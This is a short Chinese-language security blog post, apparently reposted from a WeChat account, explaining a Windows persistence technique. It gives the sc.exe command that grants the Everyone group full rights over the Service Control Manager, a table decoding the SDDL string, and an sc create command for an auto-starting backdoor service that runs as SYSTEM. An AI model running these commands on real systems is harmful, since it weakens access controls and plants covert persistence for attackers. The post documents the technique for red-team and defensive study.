Service Control Manager 持久化后门

admin
admin
admin
102369
文章
87
评论
2023年10月10日00:44:47评论36 views字数 845阅读2分49秒阅读模式

Service Control Manager 持久化后门

向日葵追寻着光,却抬眼遇到了星星。

Service Control Manager服务控制管理器(SCM)负责在 Windows 环境中启动和停止服务,包括设备驱动程序和启动应用程序。

Microsoft Windows 2000 以及更高版本中引入了安全描述符定义语言 (SDDL) 。在 Windows 2000 之前,安全描述符表示为十六进制字节。服务控制管理器(SCM)的权限由自主访问控制列表 (DACL) 管理,这些列表也由 SDDL 表示。
可以通过 SDDL 修改服务控制管理器SCM)的权限,授予Everyone 组别对服务控制管理器的权限。设置后门服务之后,该服务将在每次计算机启动时以 SYSTEM 级别权限执行任意命令或有效负载。
sc.exe sdset scmanager D:(A;;KA;;;WD)

Service Control Manager 持久化后门

下表显示了上述命令中 SDDL 首字母缩略词的含义。

D

Discretionary Access Control List
 自由访问控制列表

A

Access Control Entry – Access Allowed
 访问控制条目 – 允许访问

KA

KEY_ALL_ACCESS – Rights KEY_ALL_ACCESS – 权利

WD

Security Principal of Everyone Group
 Everyone组的安全主体

创建后门

sc create pentestlab displayName= "pentestlab" binPath= "C:pentestlab.exe" start= auto

Service Control Manager 持久化后门

查看服务

Service Control Manager 持久化后门

监听,重启电脑后

Service Control Manager 持久化后门

一些命令速查

删除一个服务
sc.exe delete [service_name]
启动一个服务
sc.exe start [service_name]
停止一个服务
sc.exe stop [service_name]
修改服务的配置信息
sc.exe config [service_name] [option1=value1] [option2=value2]

原文始发于微信公众号(Enginge):Service Control Manager 持久化后门

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月10日00:44:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Service Control Manager 持久化后门https://cn-sec.com/archives/2098275.html

发表评论

匿名网友 填写信息